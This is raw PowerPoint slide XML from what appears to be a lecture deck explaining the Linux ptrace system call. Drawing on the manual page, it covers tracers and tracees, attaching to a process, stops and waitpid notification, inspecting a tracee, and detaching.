                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>tracer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>") may observe and control the execution of another process (the "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>tracee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>"), and examine and change the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>tracee's</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> memory and registers. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>It is primarily used to implement </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>breakpoint debugging and </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>system call tracing.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="標題 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>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dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Linux manual page</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000"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45</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32168921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A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>tracee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> first needs to be attached to the tracer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Attachment and subsequent commands are per thread: in a multithreaded process, every thread can be individually attached to a (potentially different) tracer, or left not attached and thus not debugged.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Therefore, "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>tracee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>" always means "(one) thread", never "a (possibly multithreaded) process". </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="標題 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Tracee vs. Thread </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Linux manual page</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46</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39791033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7"/>
            <a:ext cx="8568952" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>Ptrace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> commands are always sent to a specific </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>tracee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> using a call of the form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PTRACE_foo</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pid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, ...) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>where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pid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> is the thread ID of the corresponding Linux thread.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> (Note that in this page, a "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>multithreaded process</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>" means a thread group consisting of threads created using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>clone</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>(2)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>CLONE_THREAD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>flag.)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="標題 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>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dirty="0"/>
              <a:t> call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Linux manual page</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47</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28585767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A process can initiate a trace by calling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>fork</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>(2)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> and having the resulting child do a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PTRACE_TRACEME</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, followed (typically) by an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>(2)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Alternatively, one process may commence tracing another process using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PTRACE_ATTACH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PTRACE_SEIZE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="標題 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Initialize a Trace </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Linux manual page</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48</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5057974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611559" y="2492896"/>
            <a:ext cx="8064897" cy="3096344"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>While being traced, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>tracee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> will stop each time a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>signal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> is delivered, even if the signal is being ignored. (An exception is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SIGKILL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, which has its usual effect.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D8110"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ptrace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D8110"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(PTRACE_ATTACH, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D8110"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D8110"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, NULL, NULL)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>is pretty straight forward, it takes the PID of the process we want to target. When called, a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SIGSTOP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> is sent, resulting in the process pausing its execution. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Adam Chester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="標題 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>When a Tracee will Stop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Linux manual page</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49</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42548002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27584" y="2636912"/>
            <a:ext cx="7632848" cy="3096344"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The tracer will be notified at its next call to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>waitpid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>(2)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> (or one of the related "wait" system calls); that call will return a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>status</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> value containing information that indicates the cause of the stop in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>tracee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="標題 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>When a Tracer will be Notified        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Linux manual page</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50</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21553483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99591" y="2675467"/>
            <a:ext cx="7776865" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>While the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>tracee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> is stopped, the tracer can use various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dirty="0"/>
              <a:t> requests to inspect and modify the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>tracee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The tracer then causes the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>tracee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> to continue, optionally ignoring the delivered signal (or even delivering a different signal instead).</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="標題 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Inspect and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>Mofidy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> a Tracee           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Linux manual page</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51</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2456021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When the tracer is finished tracing, it can cause the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>tracee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> to continue executing in a normal, untraced mode via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PTRACE_DETACH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="標題 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Stop Tracing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Linux manual page</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52</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
